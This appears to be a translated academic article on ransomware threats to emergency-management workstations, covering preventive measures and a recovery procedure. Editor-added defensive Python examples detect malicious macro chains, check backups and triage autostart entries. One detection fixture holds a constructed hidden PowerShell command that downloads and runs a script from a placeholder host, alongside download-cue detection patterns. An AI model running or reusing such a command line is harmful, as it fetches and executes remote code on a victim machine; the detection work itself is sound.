Information Security of Automated Workplaces in Emergency Situations
V.P. Andreev, Cand. Sc. (Military), St. Petersburg University of the Ministry of Internal Affairs of Russia, St. Petersburg, Russia
A.I. Dergachev, Cand. Sc. (Military), Emperor Alexander I St. Petersburg State Transport University, St. Petersburg, Russia
A.K. Chernykh, Dr. Sc. (Engineering), St. Petersburg Military Institute of the National Guard of the Russian Federation, St. Petersburg, Russia
Abstract. The paper considers the information threats that ransomware poses to officials of emergency management bodies who use personal computers to plan the elimination of the consequences of emergency situations. Preventive measures are given, together with ways of recovering data needed for planning those processes that ransomware has encrypted or blocked.
Keywords: information threats, unauthorized access, protection of confidential information, malware, ransomware.
Introduction
In accordance with the Doctrine of Information Security of the Russian Federation [1], protecting the data that officials of emergency management bodies (hereinafter DL OU, after the Russian abbreviation) obtain from regional computer networks is of particular relevance in a region where the elimination of the consequences of an emergency has to be planned in real time. Protecting the results produced by the mathematical models used in emergency response planning is equally relevant.
Let us consider the main information threats to the personal computers of DL OU engaged in planning the elimination of the consequences of an emergency situation, and the measures that counter these threats.
Attacks on the personal computers of these officials are carried out by attackers who try to make it as difficult as possible to use the data from regional networks that the plan for eliminating the consequences of an emergency requires; their aim is to disrupt the operational management of these processes [2-7].
Accordingly, methods of countering malicious programs that lock the DL OU's computer or encrypt all the data needed to plan the elimination of the consequences of an emergency situation are of current relevance.
Malicious programs that block the operation of computers
The most typical example of such programs is the Trojan GPCode. On infecting a computer it connects to its server and downloads an RSA public key, with which it encrypts the data on that computer. A new, unique key pair was generated for each newly infected computer, so only the ransomware operators held the private keys needed to decrypt the files. According to Kaspersky Lab, the sinkhole servers that took over the malware's domains received requests from 2,764 unique IP addresses of victims' computers in more than 30 countries [8]. In recent years such programs have become less common, because they have ceased to be an unexpected "surprise" for DL OU, who already know what measures to take; instead, new ransomware programs and their modifications keep appearing: in 2016 alone, 62 new families and about 40 thousand modifications were recorded [8].
It should be noted that attackers have begun to use increasingly sophisticated infection methods, for example malicious code placed in the form of analytics scripts on the websites of scientific organizations to infect visitors' devices, or entirely legitimate software: administrative tools and various utilities for optimizing or automating tasks.
Thus in 2016 a whole family of new PowerWare ransomware was discovered [9]. It uses a Microsoft Office application together with the PowerShell utility that is part of the Windows operating system. PowerWare arrives as a Word document with macros. The macro creates and runs a cmd.exe command line that calls the PowerShell utility with options that download and run the malicious PowerWare code.
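As an added illustration (not part of the original article), the chain described above, Word to cmd.exe to PowerShell, can be recognized in endpoint process-creation telemetry. The Python script below was written for this edition; it runs over a few constructed process-creation events (the host, paths, the URL http://example.invalid/fixed.ps1 and the command lines are invented) and flags a PowerShell process whose ancestry contains an Office application, or whose command line carries two or more download-and-execute cues. The cue patterns are the editor's assumptions, not signatures taken from [9].

```python
"""Detection of the Word -> cmd.exe -> PowerShell chain (added example, constructed input)."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line cues typical of download-and-execute PowerShell (assumed patterns).
CUES = {
    "download": r"downloadfile|downloadstring|invoke-webrequest|net\.webclient",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "policy_bypass": r"-ex(ec|ecutionpolicy)?\s+bypass",
    "encoded_command": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "invoke_expression": r"\biex\b|invoke-expression",
}

# Constructed PowerShell command line of the kind a malicious macro launches via cmd.exe.
PS_CMD = ("powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
          "\"(New-Object Net.WebClient).DownloadFile('http://example.invalid/fixed.ps1',"
          "'C:\\Users\\user\\AppData\\Local\\Temp\\fixed.ps1'); "
          "& 'C:\\Users\\user\\AppData\\Local\\Temp\\fixed.ps1'\"")

# Constructed sample: a flattened view of process creation on one host (pid, parent pid, image, command line).
SAMPLE_EVENTS = [
    Event(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(1200, 400, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          r'"WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.doc"'),
    Event(1310, 1200, r"C:\Windows\System32\cmd.exe", "cmd /c " + PS_CMD),
    Event(1322, 1310, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    Event(1400, 1200, r"C:\Windows\splwow64.exe", "splwow64.exe"),            # benign print helper
    Event(2000, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell -NoProfile -File C:\Scripts\Get-Inventory.ps1"),        # benign admin script
    Event(2100, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),  # one cue only: not alerted
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(pid, by_pid):
    """Image names from the process itself up to the root of its ancestry."""
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev.pid not in seen:
        seen.add(ev.pid)
        chain.append(basename(ev.image))
        ev = by_pid.get(ev.ppid)
    return chain


def detect(events):
    """Return alerts for PowerShell processes spawned under an Office application
    or carrying at least two download-and-execute cues on the command line."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        chain = lineage(e.pid, by_pid)
        office = next((p for p in chain[1:] if p in OFFICE_APPS), None)
        cues = sorted(name for name, pat in CUES.items() if re.search(pat, e.cmdline, re.I))
        if office is None and len(cues) < 2:
            continue
        alerts.append({
            "pid": e.pid,
            "severity": "high" if office and cues else "medium",
            "chain": " <- ".join(chain),
            "office_ancestor": office,
            "cues": cues,
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The benign events are there on purpose: an administrator's script run from Explorer produces no alert, and a single cue such as an execution-policy bypass is not enough on its own, while any PowerShell launched under Word is reported regardless of its arguments.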
Of particular danger are the services that appeared in 2015 operating on the RaaS model ("ransomware as a service"), which allow any user, even one without relevant training, to register and start distributing Trojan ransomware. The danger is that such "services" can be used by novices and technically unprepared attackers whose actions may make it impossible to recover the information after infection. An example of such a service is Satan, hosted on the anonymous network The Onion Router, known by the abbreviation Tor.
Preventive measures to prevent unauthorized access to the personal computer of DL OU
To prevent unauthorized access to a personal computer and the risk of losing confidential information or infecting the computer with ransomware, the following preventive measures should be observed first of all.
1. Use reliable Internet services. Protecting DL OU data is impossible without appropriate action on the part of the Internet services used for planning the elimination of the consequences of emergency situations. The protection methods currently available are not always sufficient, although some services have begun to take additional measures to protect their users, for example encrypting the data transmitted between their own servers.
2. Do not use cloud storage as a backup for sensitive data. First, information placed in the "cloud" is practically freely accessible to the developers of the service. Second, after a hacker attack on a "cloud" service that lacks sufficiently reliable protection against hacking, your data may be stolen or destroyed.
3. The main way to protect a personal computer is to install a reliable anti-virus program that can prevent infection. Modern anti-virus products include an intrusion prevention system that blocks even unknown versions of Trojans before they enter the system. In the GPCode attack, for example, the malicious DOC file attached to the spam e-mail is detected as Trojan-Dropper.MSWord.Tored.a, the component that downloads GPCode to the computer is detected as Trojan-Downloader.Win32.Small.crb, and GPCode itself is detected by the anti-virus engine. Working without anti-virus protection enabled, especially with files from dubious sources, can result in irretrievable loss of information. The main function of an anti-virus program, activity monitoring, should always be enabled.
4. Make regular backups of your data, preferably on other devices.
5. Update the software on your computer in a timely manner. This concerns first of all updates for the installed operating system, for the security components that are part of the operating system, and for malware removal tools. Updates improve the compatibility of the installed software and fix errors and vulnerable fragments of the operating system.
6. Keep confidential information separate from other data.
7. Do not use open Wi-Fi networks in public places. If necessary, use only the network names and passwords provided by the administrators of those places. When visiting sites whose protection you are unsure of, enable the "Always use a secure connection" (HTTPS) option in the settings.
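Measures 4 and 6 are only useful if the backup can be trusted before it is restored: a copy taken after infection, or a backup device that was itself reachable by the ransomware, may contain encrypted files. As an added worked example (the editor's code, not part of the article), the Python script below records a SHA-256 manifest of the working data, keeps the manifest apart from the backup, and later verifies the backup copy against it, flagging files that are missing, changed, or look encrypted. The file names, the appended extensions in RANSOM_SUFFIXES and the entropy threshold are assumptions; the "ransomware" action is simulated by overwriting one file with random bytes and renaming it.

```python
"""Backup integrity manifest with ransomware-damage check (added example, constructed data)."""
import hashlib
import json
import math
import os
import shutil
import tempfile
from collections import Counter
from pathlib import Path

RANSOM_SUFFIXES = (".locked", ".crypt", ".encrypted", ".enc")  # assumption: commonly appended extensions
HIGH_ENTROPY = 7.5  # bits per byte; documents are well below, ciphertext is close to 8


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; high values suggest encrypted or compressed content."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_manifest(root: Path) -> dict:
    """Relative path -> digest and size for every file under root (taken before any incident)."""
    return {str(p.relative_to(root)).replace(os.sep, "/"): {"sha256": sha256_file(p), "size": p.stat().st_size}
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify(root: Path, manifest: dict) -> dict:
    """Compare a backup copy with the stored manifest and classify every file."""
    current = build_manifest(root)
    report = {"ok": [], "modified": [], "missing": [], "unexpected": [], "suspicious": []}
    for rel, meta in manifest.items():
        if rel not in current:
            report["missing"].append(rel)
        elif current[rel]["sha256"] == meta["sha256"]:
            report["ok"].append(rel)
        else:
            report["modified"].append(rel)
    for rel in current:
        if rel not in manifest:
            report["unexpected"].append(rel)
    # Changed or new files that carry a ransom extension or look like ciphertext.
    for rel in report["modified"] + report["unexpected"]:
        head = (root / rel).read_bytes()[:65536]
        if rel.endswith(RANSOM_SUFFIXES) or entropy(head) > HIGH_ENTROPY:
            report["suspicious"].append(rel)
    return {k: sorted(v) for k, v in report.items()}


def demo() -> dict:
    """Constructed scenario: manifest taken, backup made, then the backup copy is damaged."""
    with tempfile.TemporaryDirectory() as tmp:
        src, backup, vault = Path(tmp) / "work", Path(tmp) / "backup", Path(tmp) / "vault"
        src.mkdir()
        vault.mkdir()  # stands in for the separate device that holds the manifest
        (src / "roster.txt").write_text("unit, location, contact\n" * 40)
        (src / "plan.docx").write_bytes(b"response plan draft, version 3\n" * 100)
        (vault / "manifest.json").write_text(json.dumps(build_manifest(src), sort_keys=True))
        shutil.copytree(src, backup)
        # Simulated ransomware on the backup: random bytes stand in for ciphertext, then rename.
        (backup / "plan.docx").write_bytes(os.urandom(4096))
        (backup / "plan.docx").rename(backup / "plan.docx.locked")
        return verify(backup, json.loads((vault / "manifest.json").read_text()))


if __name__ == "__main__":
    print(demo())
```

The manifest must be written to a device the workstation cannot overwrite afterwards, otherwise the ransomware can re-hash what it encrypted; the entropy test catches encrypted files even when the attacker keeps the original names.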
Note that if a DL OU nevertheless becomes a victim of ransomware and the data on the computer has been encrypted, the No More Ransom site should be visited from an uninfected computer. In July 2016 the Dutch National Police, Europol, Intel Security and Kaspersky Lab created the non-profit project No More Ransom to help restore data blocked by ransomware.
In addition, Kaspersky Lab experts have created the utilities XoristDecryptor and RectorDecryptor to combat these programs.
If running the utilities does not produce results, the malicious file should be sent to Kaspersky Lab, where experts study it; once a solution for neutralizing it is found, it is entered into the database, and re-running the utility should remove the infection.
Cases in which the computer is locked by a banner demanding that an SMS be sent to obtain an unlock code are less dangerous, and an experienced DL OU can usually unlock the computer. It should be noted that there is no universal solution in such cases: since attackers constantly modify the malicious code, the way of neutralizing it depends on each specific case of infection.
In all cases of infection almost the entire computer is blocked, including the Start button and the Task Manager program.
Algorithm for unlocking the computer
We propose the following algorithm for restoring the locked data on a DL OU computer.
1. Restart the computer in safe mode and try to roll back the system; this rarely helps. Try to open Task Manager (press Ctrl+Alt+Delete quickly during boot) before the banner starts. If it opens, select the Processes tab and end new, unfamiliar processes. Determine the name of the banner's process by elimination: end some processes and see what happens; if the banner disappears, reboot and repeat, and so on. Once the process name is known, search the whole computer for it with display of hidden files enabled, and delete the banner's files. Next open the Run dialog (Windows + R) and enter msconfig. On the Startup tab check the properties of the programs that run at startup: name, publisher and startup impact. Disable suspicious, unknown programs, noting the names and locations of their files. After deleting those files, restart the computer.
2. To unlock Task Manager and the Registry Editor you can use special unlocker programs, for example the portable version of Winhelper. The program runs on top of various banners ("on top of all windows" mode). Its "Recovery" tab restores the Registry Editor and the Explorer shell (explorer.exe), and its "Startup" tab lists all programs that run at startup.
3. Another fairly effective way to unlock a personal computer is to use bootable rescue media, such as WinDoza Live CD & USB, which contain tools for restoring the operating system after it has been blocked by a banner.
4. Finally, one of the easiest ways to get rid of a Trojan blocker is to consult, from an uninfected computer, the Doctor Web unlock-code database at https://www.drweb.com/xperf/unlocker/?lng=ru and, using the form there, find the unlock code by wallet number, phone number or banner image.
Note. Unlocking the computer is not sufficient on its own; the traces of the Trojan that was found must also be removed.
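The hardest part of steps 1 and 2 is deciding which startup entries are "suspicious and unknown". As an added worked example (the editor's code, not the article's), the Python script below triages the autostart Run keys once they have been exported as text with the standard Windows command reg export (the export format, with doubled backslashes and escaped quotes, is what the parser expects). It flags executables in user-writable locations, system binary names that do not live under C:\Windows, and script hosts launching scripts. The sample export, value names and paths are constructed; the rule lists are the editor's assumptions.

```python
"""Triage of autostart (Run key) entries from a constructed `reg export` text (added example)."""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svchost"="C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe"
"Updater"="C:\\ProgramData\\Updater\\wscript.exe //B C:\\ProgramData\\Updater\\run.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
'''

# Assumed rule lists.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# "name"="data" lines of REG_SZ values; escaped \" and \\ inside are consumed as pairs.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(text: str):
    """Yield (key, value name, command line) for string values under *\\Run* keys."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and "\\Run" in key:
            m = VALUE_RE.match(line)
            if m:
                yield key, unescape(m.group(1)), unescape(m.group(2))


def exe_path(cmd: str) -> str:
    """Executable part of a command line: the quoted token, or the first space-delimited one."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    return cmd.split(" ", 1)[0]


def triage(text: str):
    """Return one finding per autostart entry, most reasons first; an empty reason list means nothing notable."""
    findings = []
    for key, name, cmd in parse_run_entries(text):
        exe = exe_path(cmd)
        low = exe.lower()
        base = low.rsplit("\\", 1)[-1]
        reasons = []
        if any(d in low for d in USER_WRITABLE):
            reasons.append("executable in user-writable location")
        if base in SYSTEM_NAMES and not low.startswith("c:\\windows\\"):
            reasons.append("system binary name outside C:\\Windows")
        if base in SCRIPT_HOSTS:
            reasons.append("script host launching a script")
        findings.append({"key": key, "name": name, "exe": exe, "reasons": reasons})
    return sorted(findings, key=lambda f: -len(f["reasons"]))


if __name__ == "__main__":
    for f in triage(SAMPLE_REG):
        print(f["name"], "->", f["exe"], f["reasons"] or "(nothing notable)")
```

A location-only hit (the OneDrive entry here) is where the publisher check from step 1 decides the matter, since some legitimate software does install under AppData; an entry with a system binary name in a Temp folder needs no further argument.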
Models with sequential information
In conclusion, we present the concept of constructing mathematical models whose use, during an attack on the computer of an official of an emergency management body, minimizes the probability of blocking the information needed by the currently executing calculation module of the model, which prepares the initial data for planning the elimination of the consequences of an emergency situation and obtains the results of the model. It should be noted that the efficiency of models synthesized in this way, calculated according to the approaches given in [10, 11], is practically not reduced.
The idea is that the information for the model is converted to a form that can be used by different sequences of modules in the calculation scheme. The scheme for automated formation of the configuration structure of the model, which connects the calculation modules in sequence together with the information needed to solve each of them, is shown in fig. 1.
Fig. 1. Scheme for the automated generation of the configuration structure of the computation modules
As an explanation to fig. 1, note that the connection of module $M_j$ to module $M_0$ (block 3, fig. 1) is defined as a group of equalities of the form
$$V_K = W_K, \quad K = \overline{K_0, K_n} \ (\text{fig. 2}),$$
where $V_K$ is the identifier of the $K$-th input parameter of module $M_0$; $W_K$ is the identifier of the $K$-th output parameter of module $M_j$; $[K_0, K_n]$ is the interval over which the index $K$ varies.
The selection of a new module $M_0 \in \{M_N\}$ for the module (block 11, fig. 1) is carried out according to the rule
$$M_0 = \max \{ M_j \in \{M_N\} \},$$
where $\{M_N\} = \{ M_j : i = \overline{k-1, 1},\ j = \overline{1, n} \}$ and $n$ is the number of modules.
Fig. 2. Fragment of the model structure (including the ranking of the modules)
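As an added worked example (the editor's code, not from the article), the connection rule of block 3 and the selection rule of block 11 can be written as a small scheduler. The module names, their input and output identifiers, and the ranking criterion used to evaluate the max are assumptions, since the article does not say what the modules compute or how they are ranked; with them the example shows the point of the section: when an input identifier is blocked on the workstation, a different module sequence reaching the same result is found automatically.

```python
"""Sequential assembly of calculation modules by parameter-identifier matching
(added example illustrating blocks 3 and 11 of fig. 1; all modules and identifiers are invented)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Module:
    name: str
    inputs: frozenset   # identifiers V_K of the module's input parameters
    outputs: frozenset  # identifiers W_K of the module's output parameters


def connectable(m: Module, available: set) -> bool:
    """Block 3: m can be attached when for every input K the equality V_K = W_K holds
    with an output identifier already produced, i.e. the whole group of equalities is satisfied."""
    return m.inputs <= available


def rank(m: Module, unused: list) -> int:
    """Assumed ranking criterion (the article gives none): number of still-unused
    modules that consume at least one of m's outputs."""
    return sum(1 for u in unused if u is not m and u.inputs & m.outputs)


def plan(modules, initial, goal, blocked=frozenset()):
    """Build the module sequence that yields `goal`. Identifiers in `blocked` stand for
    data locked or encrypted on the workstation. Returns None if no sequence remains."""
    available = set(initial) - set(blocked)
    unused = list(modules)
    order = []
    while goal not in available:
        # candidates: attachable modules that would add at least one new identifier
        cands = [m for m in unused if connectable(m, available) and not m.outputs <= available]
        if not cands:
            return None
        # block 11: M_0 = max over the candidates; ties go to the module listed first
        m0 = max(cands, key=lambda m: (rank(m, unused), -modules.index(m)))
        order.append(m0.name)
        available |= m0.outputs
        unused.remove(m0)
    return order


# Constructed example: the hazard zone can be obtained in two independent ways.
MODULES = [
    Module("M1", frozenset({"area_map", "population"}), frozenset({"evac_routes"})),
    Module("M2", frozenset({"sensor_feed"}), frozenset({"hazard_zone"})),
    Module("M2b", frozenset({"area_map", "weather"}), frozenset({"hazard_zone"})),
    Module("M3", frozenset({"hazard_zone", "evac_routes"}), frozenset({"resource_plan"})),
    Module("M4", frozenset({"resource_plan"}), frozenset({"schedule"})),
]
INITIAL = {"area_map", "population", "sensor_feed", "weather"}

if __name__ == "__main__":
    print(plan(MODULES, INITIAL, "schedule"))
    print(plan(MODULES, INITIAL, "schedule", blocked={"sensor_feed"}))
    print(plan(MODULES, INITIAL, "schedule", blocked={"sensor_feed", "weather"}))
```

With nothing blocked the sequence is M1, M2, M3, M4; with sensor_feed blocked the scheduler substitutes M2b and still reaches the schedule; with both sensor_feed and weather blocked no sequence exists, which is exactly the situation the redundancy of modules is meant to avoid.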
Summary
Thus, the article proposes:
- preventive measures against unauthorized access to the personal computers of officials of emergency management bodies;
- ways of restoring data, needed for planning the elimination of the consequences of an emergency situation, that a ransomware program has encrypted or locked;
- the concept of constructing models whose use, during an attack on the computer of an official of an emergency management body, minimizes the probability of blocking the information needed to run the model.
References
1. The Doctrine of Information Security of the Russian Federation [Doktrina informatsionnoy bezopasnosti Rossiyskoy Federatsii]. Approved by Decree of the President of the Russian Federation No. 646 of 5 December 2016. Accessed via the ConsultantPlus legal reference system.
2. Anisimov V.G., Selivanov A.A., Anisimov E.G. Methods of Evaluating the Effectiveness of Information Protection in the System of Interdepartmental Information Interaction in the Management of the Defense of the State [Metodika otsenki effektivnosti zashchity informatsii v sisteme mezhvedomstvennogo informatsionnogo vzaimodeystviya pri upravlenii oboronoy gosudarstva], Information and Space [Informatsiya i kosmos], 2016, No. 4, pp. 76-80.
3. Bogoeva E.M. et al. The Formalization of the Procedure of a Risk-based Approach in the Implementation of the Public Authorities' Control Functions [Formalizatsiya protsedury risk-orientirovannogo podkhoda pri vypolnenii gosudarstvennymi organami kontrol'nykh funktsiy], Bulletin of the Russian Customs Academy [Vestnik Rossiyskoy tamozhennoy akademii], 2014, No. 4 (29), pp. 96-102.
4. Balyasnikov V.V., Vedernikov Yu.V. et al. Causal Analysis Model Based on the Use of Data About Special Situations [Model' prichinnogo analiza na osnove ispol'zovaniya dannykh ob osobykh situatsiyakh], Questions of Defense Equipment. Series 16: Technical Means to Counter Terrorism [Voprosy oboronnoy tekhniki. Seriya 16: Tekhnicheskie sredstva protivodeystviya terrorizmu], 2015, No. 1-2, pp. 31-38.
5. Samolenkov V.A. et al. Introduction to the Theory of Effectiveness of Combat Actions of Rocket Troops and Artillery: monograph [Vvedenie v teoriyu effektivnosti boevykh deystviy raketnykh voysk i artillerii: monografiya], Moscow, Military Academy of the General Staff of the Armed Forces of the Russian Federation, 2008, 180 p.
6. Anisimov V.G., Anisimov E.G. et al. Risk-oriented Approach to the Organization of Control in the Security Subsystems of Information Systems [Risk-orientirovannyy podkhod k organizatsii kontrolya v podsistemakh obespecheniya bezopasnosti informatsionnykh sistem], Information Security Problems. Computer Systems [Problemy informatsionnoy bezopasnosti. Komp'yuternye sistemy], 2016, No. 3, pp. 61-67.
7. Garkushev A.Yu., Saurenko T.N. et al. Methodological Basis for Constructing Indicators of Effectiveness of Control Activities of Public Authorities [Metodologicheskie osnovy postroeniya pokazateley effektivnosti kontrol'noy deyatel'nosti organov gosudarstvennoy vlasti], Questions of Defense Equipment. Series 16: Technical Means to Counter Terrorism [Voprosy oboronnoy tekhniki. Seriya 16: Tekhnicheskie sredstva protivodeystviya terrorizmu], 2015, No. 3-4, pp. 17-20.
8. Ivanov A., Emm D., Sinitsyn F., Pontiroli S. Kaspersky Security Bulletin 2016. Story of the Year. Ransomware: a Revolution [Kaspersky Security Bulletin 2016. Syuzhet goda. Programmy-vymogateli: revolyutsiya]. Available at: http://securelist.ru/analysis/ksb/29788/kaspersky-security-bulletin-2016-story-of-the-year (accessed 05.04.2017).
9. Sconzo M., Valdez R. Threat Alert: PowerWare, New Ransomware Written in PowerShell, Targets Organizations via Microsoft Word. Carbon Black blog, 25 March 2016. Available at: http://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word (accessed 05.04.2017).
10. Maslakov M.D., Bagretsov S.A., Chernykh A.K. On One Approach to Evaluating the Effectiveness of Mathematical Models [Ob odnom podkhode k otsenke effektivnosti matematicheskikh modeley], Problems of Risk Management in the Technosphere [Problemy upravleniya riskami v tekhnosfere], 2013, No. 3 (27), pp. 67-73.
11. Artamonov V.S., Chernykh A.K., Klykov P.N. An Approach to Assessing the Effectiveness of Management Systems of Organizational Systems Operating in Real Time [Podkhod k otsenke effektivnosti sistem upravleniya organizatsionnymi sistemami, funktsioniruyushchimi v real'nom masshtabe vremeni], Problems of Risk Management in the Technosphere [Problemy upravleniya riskami v tekhnosfere], 2014, No. 4 (32), pp. 60-68.